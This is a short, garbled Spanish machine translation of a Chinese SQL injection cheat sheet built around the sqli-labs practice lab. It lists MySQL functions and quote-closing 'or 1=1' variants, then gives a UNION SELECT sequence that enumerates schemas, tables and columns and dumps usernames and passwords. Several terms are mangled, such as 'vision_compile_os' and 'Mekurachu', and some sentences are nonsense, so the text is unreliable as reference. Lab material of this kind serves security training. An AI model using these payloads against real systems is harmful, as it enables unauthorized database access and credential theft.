Resumen de inyección SQL sencilla (a)
0x01
(1) inyectados Categoría: ojos del espectador sabia ver sabiduría, no narrado en el presente documento.
(2) las funciones del sistema:
Varias funciones de uso común:
- versión () - versión del sistema;
- base de datos () - Nombre de base de datos;
- usuario) (- nombre de usuario base de datos;
- @@ datadir-- camino base de datos;
- @@ vision_compile_os-- versión del sistema operativo;
función de concatenación (3) cadena
- concat (cadena1, cadena2, ...) - sin condiciones delimitadores están conectados;
- CONCAT_WS ( 'separador', str1, str2, ...) - ramal conectado que contiene el delimitador
- GROUP_CONCAT (cadena1, cadena2, ...) - Conexiones grupo de todas las cadenas, separados por comas y
no es necesario un conocimiento detallado de lo que estas tres funciones pueden ser hallazgo desechable de todo el contenido en la línea.
(4) se utiliza generalmente para tratar declaración
o 1 = 1 #
'o 1 = 1 #
'' o 1 = 1 #
) o 1 = 1 #
') o 1 = 1 #
'') o 1 = 1 #
'')) o 1 = 1 #
(5) Las notas
- - + #, / ** / etc.
resumen
De hecho, nada más que una inyección de SQL se divide en dos partes, una cerrada declaraciones de MySQL, y la segunda es la implementación de una nueva frase construida.
0x02 variedad de métodos y procesos de inyección
(1) sqllibs inyección generales (Less1-4)
#注入点
-1' union select 1,2,3--+
#爆数据库
-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+
#爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where schema_name='security'--+
#爆字段
-1‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
#爆数据
-1‘ union select 1,username,password from users where id=2--+
Las siguientes preguntas declaración SQL ejecutadas misma no va a pagar más que decir, sólo diferencias cerrados' en el camino, unidos directamente a ella, puede ser implantado con éxito son:
or 1=1
or 1=1 --+
') or '1'=('1'
) or 1=1 --+
“) or ”1”=(“1
“) or 1=1 --+
(2) Mekurachu
Después de realizar la inyección no hacerse eco de la declaración de portada llamado persianas.